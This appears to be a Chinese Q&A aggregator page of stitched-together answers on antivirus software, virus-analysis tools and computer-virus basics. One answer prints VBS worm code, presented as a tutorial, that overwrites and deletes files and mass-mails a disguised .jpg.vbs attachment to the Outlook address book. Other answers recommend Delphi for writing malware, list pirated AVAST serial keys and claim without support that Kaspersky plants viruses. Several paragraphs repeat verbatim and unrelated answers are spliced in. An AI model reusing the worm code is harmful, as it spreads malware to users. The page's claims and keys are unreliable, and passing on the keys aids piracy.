匯編語言分析惡意病毒有哪些軟體

『壹』 各種殺毒軟體的性能介紹~~~~

首先，我感覺最好的是ESETNOD32：

ESETNOD32防病毒軟體是一款擁有16年歷史的防病毒產品，在國際網路安全行業享有極高的聲譽。它採用獨有的高級啟發式引擎，對廣告軟體、RootKit、間諜軟體、木馬、病毒、蠕蟲等惡意軟體具有極高的偵測率，能夠為您的數據安全，個人隱私等提供有效的防護，360安全中心獨家提供ESETNOD32防病毒360專用版半年免費激活碼。ESETNOD32防病毒軟體概述

為了保證重要信息的安全，在平靜中呈現極佳的性能。不需要那些龐大的互聯網安全套裝，ESETNOD32就可針對肆虐的病毒威脅為您提供快速而全面的保護。它極易使用，您所要做的只是：設置它，並忘記它！

全面的保護

單獨地運行病毒、黑客軟體、廣告插件和間諜軟體的防護程序會拖慢您的計算機，並難於進行管理，必將帶來安全問題。小心那些臃腫的互聯網安全套裝，它會佔用您計算機數百兆的空間。它們的存在是因為商家把現有的產品捆綁在一起。相反，ESETNOD32則設計了一個高效的內核，作為一個單獨的、高度優化的引擎，提供統一的安全保護，防止不斷的更新病毒、蠕蟲、間諜程序的惡意攻擊。ESETNOD32擁有先進的ThreatSense®技術（專利申請中），可通過對惡意代碼進行分析，實時偵測未知的病毒，讓您時刻走在病毒編寫者的前面。

最小的影響

ESETNOD32節約內存和硬碟上的資源，讓它們為更重要的應用服務，本軟體只有11M，平均佔用23M的內存(根據檢測狀態會有變化)。Threatsense®每次更新（包括啟發式邏輯和病毒特徵碼）通常都只有20KB到50KB左右。選擇ESETNOD32將更加有效。

最快的掃描

強大的安全防護絕不拖慢計算機。ESETNOD32是用大量的匯編語言編寫而成，因其最快的偵測速度和高效的查殺能力而連續地獲獎，平均比其競爭對手快3到34倍（源自:VirusBulletin)。選擇ESETNOD32可提升您的計算機性能。

簡單的管理

ESETNOD32會自動進行自我更新，如果您是個人使用或是家庭辦公的話，您根本不用去管理它。對於大型企業，我們提供了強大的遠程分布式的網路管理，管理員可以集中部署、安裝、監測和管理成千上萬的ESETNOD32工作站和伺服器。最小影響和最快的速度可以得到的最好的保護。ESETNOD32能夠多層次地保護你的組織，在桌面、文件伺服器和郵件網關。都能為您提供最佳的解決方案。

啟發式實時偵測

啟發式是最有效的安全保護，病毒程序的防護必須要在其對計算機造成影響前實時地進行。那些時刻等待著病毒特徵庫更新的防毒軟體會給攻擊打開一扇窗，稍不留神就有可能給您造成災難性的後果。ESETNOD32則憑借其ThreatSense®技術，將會關閉這扇窗，而不像大部分依靠特徵庫更新的防毒軟體。

ESETNOD32通過實時分析應用軟體的執行過程來判斷是否存在惡意企圖，可以提前地偵測並攔截病毒威脅。而且，在大多數情況下不需要進行病毒特徵更新。與此相反，多數的其它殺毒軟體只會在他們的用戶受到新病毒攻擊後的幾個小時發布病毒特徵。

對多種威脅的保護措施由下列模件提供：

文件實時監控(AMON)常駐內存的掃描器，它會自動的掃描計算機將要訪問的文件。

ESETNOD32手動掃描器（按用戶要求進行掃描）,可選擇要掃描的文件和磁碟分區。也可以計劃在某個空閑時間自動掃描。

網路監視（IMON）常駐於內存，在Winsock級來防止惡意代碼入侵電腦，它會掃描互聯網瀏覽網頁(HTTP)、以及POP3電子郵件協議。

MSOffice文件實時防護（DMON）通過監視微軟提供的API，在打開office文件時首先檢測文件是否被感染(包括在IE上打開office文件)。

MSOutlook電子郵件保護（EMON）一個輔助的模塊，通過MAPI介面與電子郵件客戶端軟體協同工作，比如MicrosoftOutlook、MicrosoftExchange。

其次我覺得是BitDefender（就是內存占的太大，電腦性能不好的不要用啊）：

產品名稱：bitdefender互聯網安全套裝2008

產品介紹：

這是羅馬尼亞出品的一款殺毒軟體，它將為你的計算機提供最大的保護，具有功能強大的反病毒引擎以及互聯網過濾技術，為你提供即時信息保護功能。它包括：

1：永久的防病毒保護；

2：後台掃描與網路防火牆；

3：保密控制；

4：自動快速升級模塊；

5：創建計劃任務；

6：病毒隔離區。

BitDefender簡介：

BitDefender安全方案套件為各種規模的企業和個人用戶提供領先的信息安全保護。憑借防病毒，防間諜軟體，防垃圾郵件，防火牆，網路內容過濾等多種安全管理工具。BitDefender為運行在Windows/Linux/FreeBSD等平台下的桌面計算機，網關，Internet伺服器，郵件和文件伺服器等網路環境中的一切安全薄弱環節提供全面的防護。

BitDefender技術優勢：

BitDefender的安全保護技術被所有主要獨立評測機構-如ICSA實驗室和英國西海岸實驗室-所承認，其技術優勢主要表現在：虛擬環境中行為啟發式分析：(B-HAVE，)-在計算機內生成虛擬環境，模擬軟體運行並識別是否存在惡意插件，將病毒與您的操作系統完全隔離。新病毒的快速響應：BitDefender以小於4小時的新病毒響應時間在眾多防病毒軟體中獨占鰲頭。

還有就是360殺毒啦，不過因為它是免費的（記住！是免費的哦！）好像侵害了中國某些殺毒軟體的權益，被很多負面報道說成是騙人的，我用過，很好用，缺點是太容易被攻擊，而且站得村也很大：

360殺毒是由360安全中心聯合世界著名的安全公司BitDefender推出的一款面向中國用戶的殺毒軟體。結合360安全衛士對中國互聯網安全領域的深入了解，以及BitDefender享譽全球的病毒查殺技術，360殺毒為中國用戶提供了又一個優秀的安全產品。秉承360安全中心「為中國用戶打造放心安全的上網環境」的願景，360殺毒和其他360系列產品一樣，是完全免費的軟體產品。

卡巴斯基也不錯，不過就是挺黑的：他中會在你激活碼快到期時利用更新向電腦中下載病毒！逼迫你繼續用他們的產品：

基本保護

防禦所有類型惡意程序和間諜軟體

掃描文件，郵件信息和互聯網流量

保護即時消息程序(MSN,ICQ)

自動更新

擴展保護

雙向個人防火牆

保護無線上網和VPN連接。新增!

入侵防禦系統

前攝保護

應用程序智能管理控制。新增!

主動防禦未知威脅

掃描操作系統和已安裝程序中的漏洞。新增!

禁用惡意網站的鏈接。新增!

保護個人信息

禁用釣魚網站鏈接

虛擬鍵盤用來保護您登錄信息和輸入密碼的安全。新增!

防止通過安全連接(HTTPS/SSL)來竊取交換的數據。新增!

阻止未授權的撥號連接

保護個人信息

家長控制

反垃圾郵件保護

我覺得好的就這些，力挺第一種！占內存很小！你問到是買正版還是下載，我覺得從官網下載更好！

『貳』 能查出電腦里所有惡意軟體,插件,木馬,病毒等最好的軟體是什麼

360安全衛士，金山衛士，windows清理助手

『叄』 [250分的問題]關於病毒樣本和病毒分析和病毒分析工具、方法

1病毒樣本要從哪裡來
就病毒代碼的存在形式來說，有兩種，一種是病毒自身是個獨立的程序文件，另一種是它附著在正常的程序文件上，即所謂的感染，所以，病毒樣本其實就是指懷疑為病毒或染毒的文件
不過實際上，病毒程序並不一定象你說的那樣清清楚楚的有個主程序，現在的病毒木馬，都是幾個程序文件組成，相互保護、相互調用運行，它們都是病毒樣本
病毒的發作狀態，有些是能察覺出來的，比如：增加了進程、電腦速度或網速變慢、系統運行報錯等等，有些病毒發作時，幾乎沒有外在表現，很隱蔽
病毒其實就是一段程序，一是一，二是二，一點也不可怕和神秘，只要不運行它，它就是死的，非常安全，如果你怕在提取過程中誤運行了病毒，可以把病毒程序文件的擴展名改一下，改為不可被執行或被直接打開的擴展名即可，或根本就不要擴展名，這樣在拷貝、傳輸過程中就非常安全了

2要怎麼分析
（1）http://www.qiker.com/jiaocheng/hei6/%B2%A1%B6%BE%D0%C5%CF%A2/vir00041.htm（病毒分析祥解）
（2）一、Vbs腳本病毒的特點及發展現狀
VBS病毒是用VB Script編寫而成，該腳本語言功能非常強大，它們利用Windows系統的開放性特點，通過調用一些現成的Windows對象、組件，可以直接對文件系統、注冊表等進行控制，功能非常強大。應該說病毒就是一種思想，但是這種思想在用VBS實現時變得極其容易。VBS腳本病毒具有如下幾個特點：
1．編寫簡單，一個以前對病毒一無所知的病毒愛好者可以在很短的時間里編出一個新型病毒來。
2．破壞力大。其破壞力不僅表現在對用戶系統文件及性能的破壞。他還可以使郵件伺服器崩潰，網路發生嚴重阻塞。
3．感染力強。由於腳本是直接解釋執行，並且它不需要像PE病毒那樣，需要做復雜的PE文件格式處理，因此這類病毒可以直接通過自我復制的方式感染其他同類文件，並且自我的異常處理變得非常容易。
4．傳播范圍大。這類病毒通過htm文檔，Email附件或其它方式，可以在很短時間內傳遍世界各地。
5．病毒源碼容易被獲取，變種多。由於VBS病毒解釋執行，其源代碼可讀性非常強，即使病毒源碼經過加密處理後，其源代碼的獲取還是比較簡單。因此，這類病毒變種比較多，稍微改變一下病毒的結構，或者修改一下特徵值，很多殺毒軟體可能就無能為力。
6．欺騙性強。腳本病毒為了得到運行機會，往往會採用各種讓用戶不大注意的手段，譬如，郵件的附件名採用雙後綴，如.jpg.vbs，由於系統默認不顯示後綴，這樣，用戶看到這個文件的時候，就會認為它是一個jpg圖片文件。
7．使得病毒生產機實現起來非常容易。所謂病毒生產機，就是可以按照用戶的意願，生產病毒的機器（當然，這里指的是程序），目前的病毒生產機，之所以大多數都為腳本病毒生產機，其中最重要的一點還是因為腳本是解釋執行的，實現起來非常容易，具體將在我們後面談及。
正因為以上幾個特點，腳本病毒發展異常迅猛，特別是病毒生產機的出現，使得生成新型腳本病毒變得非常容易。

二、Vbs腳本病毒原理分析
1．vbs腳本病毒如何感染、搜索文件
VBS腳本病毒一般是直接通過自我復制來感染文件的，病毒中的絕大部分代碼都可以直接附加在其他同類程序的中間，譬如新歡樂時光病毒可以將自己的代碼附加在.htm文件的尾部，並在頂部加入一條調用病毒代碼的語句，而愛蟲病毒則是直接生成一個文件的副本，將病毒代碼拷入其中，並以原文件名作為病毒文件名的前綴，vbs作為後綴。下面我們通過愛蟲病毒的部分代碼具體分析一下這類病毒的感染和搜索原理：
以下是文件感染的部分關鍵代碼：
Set fso=createobject("scripting.filesystemobject") '創建一個文件系統對象
set self=fso.opentextfile(wscript.scriptfullname,1) '讀打開當前文件（即病毒本身）
vbs=self.readall ' 讀取病毒全部代碼到字元串變數vbs……
set ap=fso.opentextfile(目標文件.path,2,true) ' 寫打開目標文件，准備寫入病毒代碼
ap.write vbs ' 將病毒代碼覆蓋目標文件
ap.close
set cop=fso.getfile(目標文件.path) '得到目標文件路徑
cop.(目標文件.path & ".vbs") ' 創建另外一個病毒文件（以.vbs為後綴）
目標文件.delete(true) '刪除目標文件
上面描述了病毒文件是如何感染正常文件的：首先將病毒自身代碼賦給字元串變數vbs，然後將這個字元串覆蓋寫到目標文件，並創建一個以目標文件名為文件名前綴、vbs為後綴的文件副本，最後刪除目標文件。
下面我們具體分析一下文件搜索代碼：
'該函數主要用來尋找滿足條件的文件，並生成對應文件的一個病毒副本
sub scan(folder_) 'scan函數定義，
on error resume next '如果出現錯誤，直接跳過，防止彈出錯誤窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 當前目錄的所有文件集合
for each file in filesext=fso.GetExtensionName(file) '獲取文件後綴
ext=lcase(ext) '後綴名轉換成小寫字母
if ext="mp5" then '如果後綴名是mp5，則進行感染。請自己建立相應後綴名的文件，最好是非正常後綴名 ，以免破壞正常程序。
Wscript.echo (file)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders '搜索其他目錄；遞歸調用
scan( )
scan(subfolder)
next
end sub
上面的代碼就是VBS腳本病毒進行文件搜索的代碼分析。搜索部分scan( )函數做得比較短小精悍，非常巧妙，採用了一個遞歸的演算法遍歷整個分區的目錄和文件。

2．vbs腳本病毒通過網路傳播的幾種方式及代碼分析
VBS腳本病毒之所以傳播范圍廣，主要依賴於它的網路傳播功能，一般來說，VBS腳本病毒採用如下幾種方式進行傳播：
1）通過Email附件傳播
這是一種用的非常普遍的傳播方式，病毒可以通過各種方法拿到合法的Email地址，最常見的就是直接取outlook地址簿中的郵件地址，也可以通過程序在用戶文檔（譬如htm文件）中搜索Email地址。
下面我們具體分析一下VBS腳本病毒是如何做到這一點的：
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject("Outlook.Application") //創建一個OUTLOOK應用的對象
If outlookApp= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI") //獲取MAPI的名字空間
Set addrList= mapiObj.AddressLists //獲取地址表的個數
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count //獲取每個地址表的Email記錄數
For addrEntIndex= 1 To addrEntCount //遍歷地址表的Email地址
Set item = outlookApp.CreateItem(0) //獲取一個郵件對象實例
Set addrEnt = addr.AddressEntries(addrEntIndex) //獲取具體Email地址
item.To = addrEnt.Address //填入收信人地址 item.Subject = "病毒傳播實驗" //寫入郵件標題
item.Body = "這里是病毒郵件傳播測試，收到此信請不要慌張！" //寫入文件內容
Set attachMents=item.Attachments //定義郵件附件
attachMents.Add fileSysObj.GetSpecialFolder(0) & "\test.jpg.vbs"
item.DeleteAfterSubmit = True //信件提交後自動刪除
If item.To <> "" Then
item.Send //發送郵件
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //病毒標記，以免重復感染
End If
Next
End If
Next
End if
End Function

太多了~你能不能自己去看？網路發不來~還有250分
http://topic.csdn.net/t/20040717/09/3183195.html

『肆』 編寫計算機病毒一般用的是什麼軟體呀，是我們常用的VB，C++之類的編程軟體嗎

不是，Turbo C,還有就是Delphi的開發工具，Delphi是一種很好的惡意軟體開發語言，建議你用用

『伍』 編病毒的軟體

不能用vb編病毒。vb不是真正的編譯性語言。有時要用到系統里沒有的vb庫dll.一個dll就很大。病毒帶個這么大的dll。體積就大了。容易被中毒的人查出來，而且傳播的速度也慢。（畢竟文件大）。
一般病毒是用delphi(灰鴿子，熊貓燒香都用它）或c++(vc++）來寫的，當然也可以用匯編（那是強人的做法），bat一般不叫病毒了。雖然有時候批處理也能做出有破壞性的東西。但是畢竟不是真正的程序

『陸』 病毒都是用什麼軟體來編寫的

匯編，C, delphi 任何語言都可以寫病毒。

不同病毒原理不同。。。。

『柒』 如何檢測惡意軟體

作為一名安全工作者在日常工作中難免會用到這些惡意軟體檢測平台，例如：滲透測試中給木馬做免殺處理後檢查其免殺效果，又或者在捕獲到某惡意病毒/木馬樣本時進行簡單的檢測、分析等。

當然，使用這些平台較多的主要還是普通網民和像我這樣的ScriptKid，對於真正的樣本分析大佬來說也只是用於輔助，大多數還是會經過人工分析，因為只有這樣才能更加了解惡意軟體樣本的行為。
您好，惡意軟體可以盜取您的用戶隱私、消耗您的手機流量、暗扣您的手機費用，如發現建議您盡快處理。您可以使用騰訊手機管家進行清除。管家可以幫您檢測到軟體的惡意行為，並引導您進行一次性阻止或卸載。操作方式如下：
首先，建議您將手機獲取ROOT許可權，root後可實現保留軟體功能，阻止惡意行為的目的；同時也可確保手機能夠徹底卸載惡意軟體。
通常情況下，欺騙某人為您做事要比編寫軟體是人在不知情的情況下做事容易。因此，在 IT 行業可以看到大量的惡作劇。
與其他形式的惡意軟體一樣，惡作劇也使用社會工程來試圖欺騙計算機用戶執行某些操作。但是，在惡作劇中並不執行任何代碼；惡作劇者通常只嘗試欺騙受害者。至今惡作劇已經採用了多種形式。但特別常見的一個示例為，某個電子郵件聲稱發現了一種新的病毒類型，並要您通過轉發此郵件來通知您的朋友。這些惡作劇會浪費人們的時間，消耗電子郵件資源並佔用網路帶寬。
通常情況下，欺騙某人為您做事要比編寫軟體是人在不知情的情況下做事容易。因此，在 IT 行業可以看到大量的惡作劇。
與其他形式的惡意軟體一樣，惡作劇也使用社會工程來試圖欺騙計算機用戶執行某些操作。但是，在惡作劇中並不執行任何代碼；惡作劇者通常只嘗試欺騙受害者。至今惡作劇已經採用了多種形式。但特別常見的一個示例為，某個電子郵件聲稱發現了一種新的病毒類型，並要您通過轉發此郵件來通知您的朋友。這些惡作劇會浪費人們的時間，消耗電子郵件資源並佔用網路帶寬。
垃圾郵件是未經請求的電子郵件，用於為某些服務或產品做廣告。它通常被認做是討厭的東西，但是垃圾郵件不是惡意軟體。但是，所發送的垃圾郵件數量的飛速增長已經成為 Internet 基礎結構的一個問題，這可導致員工工作效率的降低，因為他們每天必須費力查看並刪除此類郵件。
術語"垃圾郵件"的來源尚在討論之中，但是無論它的來源是什麼，有一點是可以肯定的，那就是垃圾郵件已經成為 Internet 通信中最讓人頭痛的、長久存在的問題之一。許多人認為垃圾郵件問題如此嚴重，以至於它現在威脅到了世界各地的電子郵件通信的健康狀況。但是，我們應該注意到，除了電子郵件伺服器和防垃圾郵件軟體所承擔的負載之外，垃圾郵件實際上並不能復制或威脅某個組織 IT 系統的健康和運作。
垃圾郵件是未經請求的電子郵件，用於為某些服務或產品做廣告。它通常被認做是討厭的東西，但是垃圾郵件不是惡意軟體。但是，所發送的垃圾郵件數量的飛速增長已經成為 Internet 基礎結構的一個問題，這可導致員工工作效率的降低，因為他們每天必須費力查看並刪除此類郵件。
術語"垃圾郵件"的來源尚在討論之中，但是無論它的來源是什麼，有一點是可以肯定的，那就是垃圾郵件已經成為 Internet 通信中最讓人頭痛的、長久存在的問題之一。許多人認為垃圾郵件問題如此嚴重，以至於它現在威脅到了世界各地的電子郵件通信的健康狀況。但是，我們應該注意到，除了電子郵件伺服器和防垃圾郵件軟體所承擔的負載之外，垃圾郵件實際上並不能復制或威脅某個組織 IT 系統的健康和運作。
廣告軟體通常與宿主應用程序組合在一起，只要用戶同意接受廣告軟體即可免費提供宿主應用程序。因為廣告軟體應用程序通常在用戶接受說明應用程序用途的許可協議之後進行安裝，因而不會給用戶帶來任何不快。但是，彈出式廣告會非常令人討厭，並且在某些情況下會降低系統性能。此外，有些用戶原來並沒有完全意識到許可協議中的條款，這些應用程序收集的信息可能會導致他們擔心隱私問題。
注意： 盡管術語"間諜軟體"和"廣告軟體"經常交替使用，但只有未經授權的廣告軟體才等同於間諜軟體。為用戶提供適當的通知、選擇和控制的廣告軟體並不是欺騙性的，不應劃分為間諜軟體。還要注意到，聲稱執行特定功能（實際上執行其他任務）的間諜軟體應用程序實際上起到了特洛伊木馬的作用。

『捌』 哪有反病毒的好軟體急！！！！！那位高手給個網站！拜託。

現在網上最火的殺軟AVAST中文版
在歐洲被稱為唯一能與NOD32媲美的殺軟

AVAST v4.7 Professional官方中文版

http://down8.4.52z.com:80/soft/setupchspro4.7.rar
序列號
S6039686R6039W1106-FBYVE2MU
有效期2009.5.6
升級有效期2010.1.1

S7935192R4371Z1106-S1BJD5AJ
有效期2012.1.6
升級有效期2008.8.1

S6945137R6826L1106-WXH4K1SJ
有效期2008.4.6
升級有效期2010.9.1

皮膚下載

http://www.avast.com/eng/skins.html

來自捷克的AVAST，已有17年的歷史，但最近才在我們這里興起，它在國外市場一直處於領先地位。Avast！的實時監控功能十分強大！它擁有七大防護模塊：網路防火牆防護、標準的本地文件讀取防護、網頁防護、即時通訊軟體防護、郵件收發防護、P2P軟體防護。這么完善的防護系統，定能讓你的系統練就一副金剛不壞之身！任意開啟各項保護模塊能夠查殺流氓軟體,比如3721。升級很人性化Avast是捷克一家軟體公司(ALWIL Software)的產品。ALWIL 軟體公司的研發機構在捷克的首都－布拉格，現在他們和世界上許多國家的安全軟體機構都有良好的合作關系。早在80年代末ALWIL公司的安全軟體已經獲得良好的市場佔有率，但當時僅限於捷克地區。ALMIL公司是擅長於安全軟體方面的研發，開發的Avast Antivirus系列是他們的拳頭產品，Avast在許多重要的市場和權威評獎中都取得了驕人的成績，同樣在此後進軍國際市場上也贏得了良好的增長率。
主要特點：
（1）高偵測的反病毒表現，多次獲得過ICSA和VirusBulletin 100%認證，啟發式強大。
（2）較低的內存佔用和直觀，簡潔的使用界面。
（3）支持SKIN更換，完善的程序內存檢測
（4）對SMTP/POP3/IMAP郵件收發監控的全面保護。
（5）支持MS OUTLOOK外掛，智能型郵件帳號分析。
（6）支持宏病毒文檔修復，修復檔案後自動產生病毒還原資料庫（VRDB功能）。
（7）支持P2P共享下載軟體和即時通訊病毒檢測，保護全面。
（8）良好有效的偵測並清除病毒，如蟲，廣告和木馬程序
（9）病毒庫更新速度快，對新型病毒和木馬有迅捷的反應。
功能特性如下：
＊反病毒內核
＊自動升級
＊簡單的使用界面
＊病毒隔離區
＊實時監控
＊系統結合
＊P2P和聊天軟體監控保護
＊病毒清除
＊網路防護
＊64位系統支持
＊網頁防護
＊多國語言支持
＊增強型用戶界面
＊惡意腳本屏蔽 ＊DOS下掃描
＊擴展病毒庫升級 ＊移除病毒備份
佔用內存不到25兆,讓你老機器也流暢

『玖』 病毒分析師都用的什麼軟體分析病毒啊 要具體的 別又啥虛擬機啥的糊弄人 禁止

VMWARE 吧，至少我自己以前就是用這個來分析。(但是我自己不是病毒分析師，順便做下而已)

因為分析病毒需要盡可能隔離的系統，Vpc這種有大量「整合」的顯然不適合。
比如要分析網路訪問，就可以直接抓本地虛擬網卡的包，因為本地虛擬網卡和虛擬機是相通的。而且vmware的虛擬機做的也比vmlite|virtualbox好。

至於具體用哪個完全可以看你自己愛好了，因為對於guest系統來說並沒有太多區別。

另外一個需要注意的是，vmdk的支持較為廣泛，winmount等都可以掛載，可以復制出一個磁碟文件來嘗試直接利用host上的程序進行殺除。

我想，最後的考慮就是你在不在乎使用盜版軟體了 :)

=====================================
好吧，我看錯題目了。我自己補充下我的經驗好了：

網路抓包：wireshark
進程查詢：processxp
進程監控：processmon
主要就這三個。
其他的根據需要比如md5校檢之類。

作為業餘人士，我使用這些軟體……很方便

你可以這樣：一個原始的未被感染文件，一個被感染的文件，然後winhex之類的比較。
根深層次的分析要用debug模式分析，我只在cheatengine上改過匯編的代碼，所以我不會，所以我才用processmon這樣的軟體啊……
====================================

『拾』 計算機病毒的概念特徵分類,病毒的例子,用什麼軟體

病毒的定義

20世紀60年代初，美國貝爾實驗室的三位程序員編寫了一個名為「磁芯大戰」的游戲，游戲中通過復制自身來擺脫對方的控制，這就是所謂「病毒」的第一個雛形。

20世紀70年代，美國作家雷恩在其出版的《P1的青春》一書中構思了一種能夠自我復制的計算機程序，並第一次稱之為「計算機病毒」。

1983年11月，在國際計算機安全學術研討會上，美國計算機專家首次將病毒程序在VAX/750計算機上進行了實驗，世界上第一個計算機病毒就這樣出生在實驗室中。

20世紀80年代後期，巴基斯坦有兩個以編程為生的兄弟，他們為了打擊那些盜版軟體的使用者，設計出了一個名為「巴基斯坦智囊」的病毒，這就是世界上流行的第一個真正的病毒。

那麼，究竟什麼是計算機病毒呢？

1994年2月18日，我國正式頒布實施了《中華人民共和國計算機信息系統安全保護條例》（參見附錄一）。在該條例的第二十八條中明確指出：「計算機病毒，是指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數據，影響計算機使用，並能自我復制的一組計算機指令或者程序代碼。」

這個定義具有法律性、權威性。根據這個定義，計算機病毒是一種計算機程序，它不僅能破壞計算機系統，而且還能夠傳染到其他系統。計算機病毒通常隱藏在其他正常程序中，能生成自身的拷貝並將其插入其他的程序中，對計算機系統進行惡意的破壞。

計算機病毒不是天然存在的，是某些人利用計算機軟、硬體所固有的脆弱性，編制的具有破壞功能的程序。計算機病毒能通過某種途徑潛伏在計算機存儲介質（或程序）里，當達到某種條件時即被激活，它用修改其他程序的方法將自己的精確拷貝或者可能演化的形式放入其他程序中，從而感染它們，對計算機資源進行破壞的這樣一組程序或指令集合。
病毒的特徵

傳統意義上的計算機病毒一般具有以下幾個特點：

1、破壞性

任何病毒只要侵入系統，都會對系統及應用程序產生不同程度的影響，凡是由軟體手段能觸及到計算機資源的地方均可能受到計算機病毒的破壞。輕者會降低計算機工作效率，佔用系統資源，重者可導致系統崩潰。

根據病毒對計算機系統造成破壞的程度，我們可以把病毒分為良性病毒與惡性病毒。良性病毒可能只是干擾顯示屏幕，顯示一些亂碼或無聊的語句，或者根本沒有任何破壞動作，只是佔用系統資源。這類病毒較多，如：GENP、小球、W-BOOT等。惡性病毒則有明確的目的，它們破壞數據、刪除文件、加密磁碟或者甚至格式化磁碟，有的惡性病毒對數據造成不可挽回的破壞。這類病毒有CIH、紅色代碼等。

2、隱蔽性

病毒程序大多夾在正常程序之中，很難被發現，它們通常附在正常程序中或磁碟較隱蔽的地方（也有個別的以隱含文件形式出現），這樣做的目的是不讓用戶發現它的存在。如果不經過代碼分析，我們很難區別病毒程序與正常程序。一般在沒有防護措施的情況下，計算機病毒程序取得系統控制權後，可以在很短的時間里傳染大量程序。而且受到傳染後，計算機系統通常仍能正常運行，使用戶不會感到有任何異常。

大部分病毒程序具有很高的程序設計技巧、代碼短小精悍，其目的就是為了隱蔽。病毒程序一般只有幾百位元組，而PC機對文件的存取速度可達每秒幾百KB以上，所以病毒程序在轉瞬之間便可將這短短的幾百位元組附著到正常程序之中，非常不易被察覺。

3、潛伏性

大部分計算機病毒感染系統之後不會馬上發作，可長期隱藏在系統中，只有在滿足特定條件時才啟動其破壞模塊。例如，PETER-2病毒在每年的2月27日會提三個問題，答錯後會將硬碟加密。著名的「黑色星期五」病毒在逢13號的星期五發作。當然，最令人難忘的是26日發作的CIH病毒。這些病毒在平時會隱藏得很好，只有在發作日才會顯露出其破壞的本性。

4、傳染性

計算機病毒的傳染性是指病毒具有把自身復制到其他程序中的特性。計算機病毒是一段人為編制的計算機程序代碼，這段程序代碼一旦進入計算機並得以執行，它會搜尋其他符合其傳染條件的程序或存儲介質，確定目標後再將自身代碼插入其中，達到自我繁殖的目的。只要一台計算機染毒，如不及時處理，那麼病毒會在這台計算機上迅速擴散，其中的大量文件（一般是可執行文件）會被感染。而被感染的文件又成了新的傳染源，再與其他機器進數據交換或通過網路接觸，病毒會在整個網路中繼續傳染。

正常的計算機程序一般是不會將自身的代碼強行連接到其他程序之上的。而病毒卻能使自身的代碼強行傳染到一切符合其傳染條件的未受到傳染的程序之上。是否具有傳染性是判別一個程序是否為計算機病毒的最重要條件。

隨著計算機軟體和網路技術的發展，在今天的網路時代，計算機病毒又有了很多新的特點：

1、主動通過網路和郵件系統傳播

從當前流行的前十位計算機病毒來看，其中七個病毒都可以利用郵件系統和網路進行傳播。例如，「求職信」病毒就是通過電子郵件傳播的，這種病毒程序代碼往往夾在郵件的附件中，當收郵件者點擊附件時，病毒程序便得以執行並迅速傳染。它們還能搜索計算機用戶的郵件通訊地址，繼續向網路進行傳播。

2、傳播速度極快

由於病毒主要通過網路傳播，因此，一種新病毒出現後，可以迅速通過國際互聯網傳播到世界各地。例如，「愛蟲」病毒在一、兩天內迅速傳播到世界的主要計算機網路，並造成歐、美國家的計算機網路癱瘓。

3、變種多

現在，很多新病毒都不再使用匯編語言編寫，而是使用高級程序設計語言。例如，「愛蟲」是腳本語言病毒，「美麗殺」是宏病毒。它們容易編寫，並且很容易被修改，生成很多病毒變種。「愛蟲」病毒在十幾天中，就出現了三十多個變種。「美麗殺」病毒也生成了三、四個變種，並且此後很多宏病毒都是使用了「美麗殺」的傳染機理。這些變種的主要傳染和破壞的機理與母本病毒一致，只是某些代碼作了修改。

4、具有病毒、蠕蟲和黑客程序的功能

隨著網路技術的普及和發展，計算機病毒的編制技術也在不斷地提高。過去，病毒最大的特點是能夠復制自身給其他的程序。現在，計算機病毒具有了蠕蟲的特點，可以利用網路進行傳播。同時，有些病毒還具有了黑客程序的功能，一旦侵入計算機系統後，病毒控制者可以從入侵的系統中竊取信息，遠程式控制制這些系統。呈現出計算機病毒功能的多樣化，因而，更具有危害性。

病毒的分類

通常，計算機病毒可分為下列幾類：

1、文件型病毒

文件型病毒通過在執行過程中插入指令，把自己依附在可執行文件上。然後，利用這些指令來調用附在文件中某處的病毒代碼。當文件執行時，病毒會調出自己的代碼來執行，接著又返回到正常的執行指令序列。通常，這個執行過程發生得很快，以致於用戶並不知道病毒代碼已被執行。

2、引導扇區病毒

引導扇區病毒改變每一個用DOS格式來格式化的磁碟的第一個扇區里的程序。通常引導扇區病毒先執行自身的代碼，然後再繼續PC機的啟動進程。大多數情況，在一台染有引導型病毒的計算機上對可讀寫的軟盤進行讀寫操作時，這塊軟盤也會被感染該病毒。引導扇區病毒會潛伏在軟盤的引導扇區里，或者在硬碟的引導扇區或主引導記錄中插入指令。此時，如果計算機從被感染的軟盤引導時，病毒就會感染到引導硬碟，並把自己的代碼調入內存。觸發引導區病毒的典型事件是系統日期和時間。

3、混合型病毒

混合型病毒有文件型和引導扇區型兩類病毒的某些共同特性。當執行一個被感染的文件時，它將感染硬碟的引導扇區或主引導記錄，並且感染在機器上使用過的軟盤。這種病毒能感染可執行文件，從而能在網上迅速傳播蔓延。

4、變形病毒

變形病毒隨著每次復制而發生變化，通過在可能被感染的文件中搜索簡單的、專門的位元組序列，是不能檢測到這種病毒的。變形病毒是一種能變異的病毒，隨著感染時間的不同而改變其不同的形式，不同的感染操作會使病毒在文件中以不同的方式出現，使傳統的模式匹配法殺毒軟體對這種病毒顯得軟弱無力。

5、宏病毒

宏病毒不只是感染可執行文件，它可以感染一般軟體文件。雖然宏病毒不會對計算機系統造成嚴重的危害，但它仍令人討厭。因為宏病毒會影響系統的性能以及用戶的工作效率。宏病毒是利用宏語言編寫的，不受操作平台的約束，可以在D0S、Windows、Unix甚至在OS／2系統中散播。這就是說，宏病毒能被傳播到任何可運行編寫宏病毒的應用程序的機器中。
計算機病毒的發展趨勢

隨著Internet的發展和計算機網路的日益普及，計算機病毒出現了一系列新的發展趨勢。

1、無國界

新病毒層出不窮，電子郵件已成為病毒傳播的主要途徑。病毒家族的種類越來越多，且傳播速度大大加快，傳播空間大大延伸，呈現無國界的趨勢。

據統計，以前通過磁碟等有形媒介傳播的病毒，從國外發現到國內流行，傳播周期平均需要6－12個月，而Internet的普及，使得病毒的傳播已經沒有國界。從「美麗殺」、「怕怕」、「辛迪加」、「歡樂99」、到「美麗公園」、「探索蠕蟲」、「紅色代碼」、「求職信」等惡性病毒，通過Internet在短短幾天就傳遍整個世界。

2、多樣化

